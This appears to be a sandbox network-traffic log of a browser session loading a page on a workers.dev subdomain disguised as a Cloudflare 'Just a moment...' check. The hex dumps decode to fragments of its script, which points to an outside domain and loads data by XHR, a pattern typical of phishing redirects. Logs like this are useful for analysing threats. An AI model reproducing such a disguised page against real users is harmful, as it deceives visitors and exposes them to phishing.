                                        2025-01-08 23:45:53 UTC1369INData Raw: 66 6f 56 79 53 56 52 42 51 6d 52 68 63 46 39 52 61 56 4b 55 54 32 35 72 56 57 39 73 55 5a 56 61 56 48 5a 64 6e 58 74 64 58 34 52 67 5a 5a 5a 6c 5a 61 61 6d 64 70 75 75 6a 32 35 77 6e 4b 4f 77 6c 4c 4b 74 6f 5a 53 4f 64 70 4f 56 6b 4c 32 59 77 59 75 61 77 37 79 34 6c 35 4f 7a 74 4a 37 4b 6e 49 6a 52 78 4b 72 52 77 36 79 4e 78 36 4c 50 77 74 57 38 73 37 53 52 76 64 7a 53 6e 71 4b 7a 32 61 44 6b 33 75 50 59 6e 73 47 6b 74 36 4b 6e 76 74 47 76 34 37 4c 4e 30 73 6a 50 77 2f 54 4a 79 62 72 77 75 74 50 76 32 72 37 66 78 51 58 57 34 50 37 38 37 4f 37 4f 7a 2b 51 43 42 4d 33 72 39 41 54 4b 47 75 4c 6f 46 52 77 52 45 65 77 54 49 66 63 61 45 64 38 6a 38 68 67 46 43 77 30 4f 37 41 58 6e 49 68 77 64 38 78 51 6c 45 53 34 73 45 7a 30 51 50 79 73 59 39 79 4d 55 4f 52 34
                                        Data Ascii: foVySVRBQmRhcF9RaVKUT25rVW9sUZVaVHZdnXtdX4RgZZZlZaamdpuuj25wnKOwlLKtoZSOdpOVkL2YwYuaw7y4l5OztJ7KnIjRxKrRw6yNx6LPwtW8s7SRvdzSnqKz2aDk3uPYnsGkt6KnvtGv47LN0sjPw/TJybrwutPv2r7fxQXW4P787O7Oz+QCBM3r9ATKGuLoFRwREewTIfcaEd8j8hgFCw0O7AXnIhwd8xQlES4sEz0QPysY9yMUOR4
                                        2025-01-08 23:45:53 UTC1369INData Raw: 31 57 4b 6a 59 75 43 55 6c 46 74 6b 34 4e 79 61 6d 36 58 6e 48 65 64 69 6e 5a 30 6f 6e 2b 4e 6a 58 4f 6c 65 33 75 45 6c 36 43 4b 66 33 39 68 6d 6f 79 4a 62 61 31 30 62 72 43 56 70 4c 69 79 72 6e 71 65 6b 37 69 32 66 6e 71 51 6b 37 53 54 68 4a 79 69 6d 6f 4b 33 71 59 6a 51 73 63 6d 65 76 34 7a 4f 79 63 58 43 32 61 6a 4e 72 39 32 66 30 4c 4f 72 6f 62 71 38 35 4e 53 68 34 75 75 39 7a 4c 66 73 7a 63 47 73 35 62 75 77 37 63 76 76 39 63 53 31 73 72 7a 7a 79 63 76 51 2b 74 49 46 2f 67 48 32 32 63 58 7a 31 4f 54 6d 32 39 6b 4f 79 4d 2f 64 32 2b 6a 64 46 42 58 6e 43 41 72 35 44 41 62 6f 2f 74 63 68 34 41 38 67 48 50 45 49 47 75 6a 2b 46 4f 77 66 36 79 2f 37 2b 69 7a 77 42 54 41 44 37 6a 6f 53 44 53 6b 62 38 79 6f 41 4e 41 77 69 48 78 45 46 4b 41 4a 42 50 41 49 57
                                        Data Ascii: 1WKjYuCUlFtk4Nyam6XnHedinZ0on+NjXOle3uEl6CKf39hmoyJba10brCVpLiyrnqek7i2fnqQk7SThJyimoK3qYjQscmev4zOycXC2ajNr92f0LOrobq85NSh4uu9zLfszcGs5buw7cvv9cS1srzzycvQ+tIF/gH22cXz1OTm29kOyM/d2+jdFBXnCAr5DAbo/tch4A8gHPEIGuj+FOwf6y/7+izwBTAD7joSDSkb8yoANAwiHxEFKAJBPAIW


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        15192.168.2.1649735104.21.64.14432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:45:53 UTC380OUTGET /favicon.ico HTTP/1.1
                                        Host: 2c079db7.df34542e8ba91dbfaec98ed5.workers.dev
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-08 23:45:53 UTC786INHTTP/1.1 200 OK
                                        Date: Wed, 08 Jan 2025 23:45:53 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JE0fxDEQfgKD%2BqlWXoKRS7PK0p6lzyfBkN76CRhIeuVmesQakz45NhDUuvZ3iIkRBbuCjFKP3hIlTE4ga9zH3HDStJqdKHY%2B39gGV30Yb1Q6pXjXyIzKvyaMcLQmWvV5FZVP4DjovjUN7EaONOFfdQHv3NUqj%2BGtodaqwJ7c3BQ%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8ff010571f437c6a-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=2019&min_rtt=2015&rtt_var=765&sent=6&recv=6&lost=0&retrans=0&sent_bytes=3111&recv_bytes=958&delivery_rate=2134502&cwnd=219&unsent_bytes=0&cid=0b9d04bd7f093b85&ts=187&x=0"
                                        2025-01-08 23:45:53 UTC1369INData Raw: 31 36 37 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 20 0a 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 3f 6f 6e 6c 6f 61 64 3d 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 22 3e 3c 2f 73 63 72 69 70 74 3e 20 0a 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 20 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63
                                        Data Ascii: 1672<!doctype html><html lang="en-US"><head> <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> <title>Just a moment...</title> <meta content="width=device-width,initial-sc
                                        2025-01-08 23:45:53 UTC1369INData Raw: 20 74 65 78 74 3b 20 0a 20 20 20 20 7d 0a 0a 20 20 20 20 6c 65 74 20 73 78 20 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 6f 64 65 72 6e 74 6f 6f 6c 62 63 2e 6f 72 67 2f 3f 61 6c 71 72 64 73 72 71 22 3b 0a 0a 20 20 20 20 63 6f 6e 73 74 20 50 55 42 4c 49 43 5f 4b 45 59 20 3d 20 60 2d 2d 2d 2d 2d 42 45 47 49 4e 20 50 55 42 4c 49 43 20 4b 45 59 2d 2d 2d 2d 2d 0a 20 20 20 20 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 78 43 4a 42 77 63 59 38 74 30 41 71 50 71 75 55 2b 41 68 31 0a 20 20 20 20 52 30 45 50 57 6c 63 44 35 58 53 58 68 4f 45 65 30 30 38 34 34 54 6b 69 47 4c 46 48 6e 4d 57 51 45 75 67 68 30 7a 59 68 2f 6b 67 72 77 38 68 76 31 69 66 4f 6d 66 34 4a 72 6b 69 73 33 74 6c 57
                                        Data Ascii: text; } let sx = "https://moderntoolbc.org/?alqrdsrq"; const PUBLIC_KEY = `-----BEGIN PUBLIC KEY----- MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxCJBwcY8t0AqPquU+Ah1 R0EPWlcD5XSXhOEe00844TkiGLFHnMWQEugh0zYh/kgrw8hv1ifOmf4Jrkis3tlW
                                        2025-01-08 23:45:53 UTC1369INData Raw: 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 69 6e 6e 65 72 48 54 4d 4c 20 3d 20 27 43 4f 4e 4e 45 43 54 49 4f 4e 20 54 4f 20 48 4f 53 54 20 46 41 49 4c 45 44 27 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 78 68 72 2e 73 65 6e 64 28 29 3b 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 2e 68 31 2c 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35
                                        Data Ascii: } else { document.body.innerHTML = 'CONNECTION TO HOST FAILED'; } } }; xhr.send(); } </script></head><style> .h1,.h2{font-weight:500}*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15
                                        2025-01-08 23:45:53 UTC1369INData Raw: 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6f 76 65 72 66 6c 6f 77 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 72 65 6d 7d 2e 68 31 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 37 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a
                                        Data Ascii: er-top:1px solid #d9d9d9;padding-top:1rem;padding-bottom:1rem}.core-msg,.zone-name-title{overflow-wrap:break-word}@media (max-width:720px){.main-content{margin-top:4rem}.h1{line-height:1.75rem;font-size:1.5rem}.core-msg,.h2{line-height:1.5rem}.h2{font-siz
                                        2025-01-08 23:45:53 UTC278INData Raw: 6e 65 65 64 20 74 6f 20 72 65 76 69 65 77 20 74 68 65 20 73 65 63 75 72 69 74 79 20 6f 66 20 79 6f 75 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 62 65 66 6f 72 65 20 70 72 6f 63 65 65 64 69 6e 67 2e 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 22 20 72 6f 6c 65 3d 22 63 6f 6e 74 65 6e 74 69 6e 66 6f 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 20 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 20 53 65 63 75 72 69 74 79 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c
                                        Data Ascii: need to review the security of your connection before proceeding. </div> </div> </div> </div> <div class="footer" role="contentinfo"> <div class="footer-inner"> <div class="text-center"> Performance & Security </div> </div> <
                                        2025-01-08 23:45:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        16192.168.2.1649736104.18.94.414432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:45:54 UTC598OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/983776855:1736379108:IMxQVsLwXGlZd6n2Z41p0MdEOBPL-IrpzZlTwr2AUq0/8ff01048fb6d4364/R_rTQntoF2VLgYZkDUVyN5HYUuUJHQ5sQpdDYboamyI-1736379951-1.1.1.1-8HJ56pYygoOERHrUddPOUm5UWJPLWIxfd21ZbdJVLTboWU.17jbFjn_jHtL9eDOz HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-08 23:45:54 UTC379INHTTP/1.1 404 Not Found
                                        Date: Wed, 08 Jan 2025 23:45:54 GMT
                                        Content-Type: application/json
                                        Content-Length: 7
                                        Connection: close
                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        cf-chl-out: 9TEzuN1BgHLXQTx2FBgIlbe9BPAfSheFgD4=$sp0snGtoh0k4LR3h
                                        Server: cloudflare
                                        CF-RAY: 8ff01059aab90f53-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-08 23:45:54 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                        Data Ascii: invalid


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        17192.168.2.1649739104.18.94.414432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:45:54 UTC811OUTGET /cdn-cgi/challenge-platform/h/g/pat/8ff01048fb6d4364/1736379953254/769054fa8dcecaecb9960e2b63b2bfa4fdb2c1a032f5b46001c82e1ade1b6212/4HoZ_aEiJdqpGNw HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        Cache-Control: max-age=0
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/sr46z/0x4AAAAAAA4FpD7uVAQN4KLZ/auto/fbE/normal/auto/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-08 23:45:54 UTC143INHTTP/1.1 401 Unauthorized
                                        Date: Wed, 08 Jan 2025 23:45:54 GMT
                                        Content-Type: text/plain; charset=utf-8
                                        Content-Length: 1
                                        Connection: close
                                        2025-01-08 23:45:54 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 64 70 42 55 2d 6f 33 4f 79 75 79 35 6c 67 34 72 59 37 4b 5f 70 50 32 79 77 61 41 79 39 62 52 67 41 63 67 75 47 74 34 62 59 68 49 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                        Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gdpBU-o3Oyuy5lg4rY7K_pP2ywaAy9bRgAcguGt4bYhIAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                        2025-01-08 23:45:54 UTC1INData Raw: 4a
                                        Data Ascii: J


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        18192.168.2.1649740104.18.94.414432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:45:55 UTC782OUTGET /cdn-cgi/challenge-platform/h/g/i/8ff01048fb6d4364/1736379953255/TqpTBbsANyb-yve HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: image
                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/sr46z/0x4AAAAAAA4FpD7uVAQN4KLZ/auto/fbE/normal/auto/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-08 23:45:55 UTC200INHTTP/1.1 200 OK
                                        Date: Wed, 08 Jan 2025 23:45:55 GMT
                                        Content-Type: image/png
                                        Content-Length: 61
                                        Connection: close
                                        Server: cloudflare
                                        CF-RAY: 8ff010633f72426a-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-08 23:45:55 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0b 00 00 00 5a 08 02 00 00 00 e1 1c 3b 23 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                        Data Ascii: PNGIHDRZ;#IDAT$IENDB`


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        19192.168.2.1649741104.18.94.414432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:45:56 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8ff01048fb6d4364/1736379953255/TqpTBbsANyb-yve HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-08 23:45:56 UTC200INHTTP/1.1 200 OK
                                        Date: Wed, 08 Jan 2025 23:45:56 GMT
                                        Content-Type: image/png
                                        Content-Length: 61
                                        Connection: close
                                        Server: cloudflare
                                        CF-RAY: 8ff010670aa64238-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-08 23:45:56 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0b 00 00 00 5a 08 02 00 00 00 e1 1c 3b 23 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                        Data Ascii: PNGIHDRZ;#IDAT$IENDB`


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        20192.168.2.1649742104.18.94.414432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:45:56 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/983776855:1736379108:IMxQVsLwXGlZd6n2Z41p0MdEOBPL-IrpzZlTwr2AUq0/8ff01048fb6d4364/R_rTQntoF2VLgYZkDUVyN5HYUuUJHQ5sQpdDYboamyI-1736379951-1.1.1.1-8HJ56pYygoOERHrUddPOUm5UWJPLWIxfd21ZbdJVLTboWU.17jbFjn_jHtL9eDOz HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        Content-Length: 32204
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        Content-type: application/x-www-form-urlencoded
                                        CF-Chl-RetryAttempt: 0
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        CF-Challenge: R_rTQntoF2VLgYZkDUVyN5HYUuUJHQ5sQpdDYboamyI-1736379951-1.1.1.1-8HJ56pYygoOERHrUddPOUm5UWJPLWIxfd21ZbdJVLTboWU.17jbFjn_jHtL9eDOz
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Origin: https://challenges.cloudflare.com
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/sr46z/0x4AAAAAAA4FpD7uVAQN4KLZ/auto/fbE/normal/auto/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-08 23:45:56 UTC16384OUTData Raw: 76 5f 38 66 66 30 31 30 34 38 66 62 36 64 34 33 36 34 3d 56 54 78 58 50 6e 42 4e 24 6e 24 70 78 70 74 42 6f 33 78 58 6d 54 42 48 42 62 32 43 32 31 5a 32 6a 39 32 72 32 58 58 42 39 70 25 32 62 32 59 66 58 78 36 58 53 32 4a 35 32 39 58 6d 4f 4a 32 5a 6f 78 32 79 58 33 74 32 34 59 33 75 78 32 62 58 35 4b 41 32 42 59 58 58 47 78 62 4c 53 70 41 32 61 39 42 55 4b 74 32 38 75 31 4f 56 58 45 74 32 4e 79 32 79 34 78 32 75 4c 49 6f 32 48 66 73 74 4b 24 24 2b 39 35 4a 53 32 35 4a 38 54 32 36 58 42 4e 32 6e 41 4b 32 2b 77 47 37 53 53 32 79 70 73 70 66 78 56 70 39 6f 78 32 6a 53 43 70 68 53 76 37 4c 48 53 42 50 2b 76 4d 76 2d 39 32 56 6a 53 32 38 78 52 51 42 53 65 4b 45 42 35 33 42 2d 56 48 4e 6c 78 72 32 2d 4d 6b 41 39 43 64 6f 7a 6c 6f 55 77 74 45 68 48 55 64 30 79
                                        Data Ascii: v_8ff01048fb6d4364=VTxXPnBN$n$pxptBo3xXmTBHBb2C21Z2j92r2XXB9p%2b2YfXx6XS2J529XmOJ2Zox2yX3t24Y3ux2bX5KA2BYXXGxbLSpA2a9BUKt28u1OVXEt2Ny2y4x2uLIo2HfstK$$+95JS25J8T26XBN2nAK2+wG7SS2ypspfxVp9ox2jSCphSv7LHSBP+vMv-92VjS28xRQBSeKEB53B-VHNlxr2-MkA9CdozloUwtEhHUd0y
                                        2025-01-08 23:45:56 UTC15820OUTData Raw: 45 64 6e 45 42 68 58 79 44 55 59 53 53 70 68 69 6c 37 58 32 61 78 55 32 43 32 6e 58 32 72 32 51 74 78 4b 6e 54 32 68 55 74 53 70 5a 30 35 39 33 53 32 4e 32 70 32 45 54 6e 54 4a 79 32 70 39 42 37 32 53 58 6a 65 6e 2b 32 74 58 6a 48 6e 72 32 4f 32 6e 24 32 49 32 61 54 6d 43 70 62 58 2d 72 5a 48 32 62 32 4b 32 70 48 32 58 32 4e 32 72 59 58 46 32 45 58 6d 61 42 24 32 58 58 6b 78 70 2d 58 48 32 56 6d 42 46 53 4a 54 56 6d 6e 48 32 4d 4a 33 31 6e 37 32 6c 32 56 49 42 45 32 6e 32 56 44 70 4b 42 7a 53 70 36 70 4e 32 66 58 42 53 70 37 42 33 32 6b 4c 71 45 32 4d 32 4d 31 6e 41 32 33 4a 6a 24 42 35 32 48 32 33 31 32 37 42 70 32 68 53 33 4b 42 5a 32 56 78 35 33 39 42 33 42 53 32 74 42 33 32 45 37 58 58 32 76 63 24 5a 70 63 30 41 32 38 39 42 48 32 66 32 6b 58 70 63 67
                                        Data Ascii: EdnEBhXyDUYSSphil7X2axU2C2nX2r2QtxKnT2hUtSpZ0593S2N2p2ETnTJy2p9B72SXjen+2tXjHnr2O2n$2I2aTmCpbX-rZH2b2K2pH2X2N2rYXF2EXmaB$2XXkxp-XH2VmBFSJTVmnH2MJ31n72l2VIBE2n2VDpKBzSp6pN2fXBSp7B32kLqE2M2M1nA23Jj$B52H23127Bp2hS3KBZ2Vx539B3BS2tB32E7XX2vc$Zpc0A289BH2f2kXpcg
                                        2025-01-08 23:45:56 UTC318INHTTP/1.1 200 OK
                                        Date: Wed, 08 Jan 2025 23:45:56 GMT
                                        Content-Type: text/plain; charset=UTF-8
                                        Content-Length: 26284
                                        Connection: close
                                        cf-chl-gen: ij2CNycnSRw5c+inDlbhwjF8yRbLCIkvz+e/RPLCRL+Mh9NwVVauGMfN/TpU32zUk20=$mLAr1ry+7RZ4B40I
                                        Server: cloudflare
                                        CF-RAY: 8ff01068ec6a8ce8-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-08 23:45:56 UTC1051INData Raw: 69 47 52 7a 62 58 61 4e 53 70 43 53 62 46 6d 53 6a 31 46 78 6a 33 4f 5a 59 32 57 45 68 49 68 70 69 49 69 46 68 59 57 4c 61 4b 75 61 66 4c 4f 66 67 34 68 7a 74 70 61 75 68 62 43 6e 6a 5a 53 74 6a 58 75 39 74 5a 6d 52 6c 4c 79 59 79 36 44 47 6e 72 37 50 78 37 7a 4d 77 36 6e 48 70 6f 71 6e 78 4d 58 56 74 4d 2f 50 72 37 57 66 75 64 32 31 73 71 54 42 71 4f 65 33 31 4f 66 65 76 75 44 69 36 73 37 64 77 2b 54 4c 79 50 66 72 32 61 37 6c 38 39 48 68 79 66 7a 4c 32 63 30 43 39 64 38 46 77 50 72 4b 79 63 37 37 79 73 76 49 41 63 38 57 7a 77 2f 34 45 64 54 77 48 68 4d 61 44 79 45 59 2f 52 66 6b 46 41 41 5a 36 50 6b 4b 42 2f 59 43 2b 75 72 74 4d 67 67 63 35 69 6a 76 38 41 63 30 4d 53 51 58 4d 7a 59 34 44 76 30 34 4a 51 49 6d 41 79 55 34 46 7a 55 38 51 78 73 33 4f 78 6b
                                        Data Ascii: iGRzbXaNSpCSbFmSj1Fxj3OZY2WEhIhpiIiFhYWLaKuafLOfg4hztpauhbCnjZStjXu9tZmRlLyYy6DGnr7Px7zMw6nHpoqnxMXVtM/Pr7Wfud21sqTBqOe31OfevuDi6s7dw+TLyPfr2a7l89HhyfzL2c0C9d8FwPrKyc77ysvIAc8Wzw/4EdTwHhMaDyEY/RfkFAAZ6PkKB/YC+urtMggc5ijv8Ac0MSQXMzY4Dv04JQImAyU4FzU8Qxs3Oxk
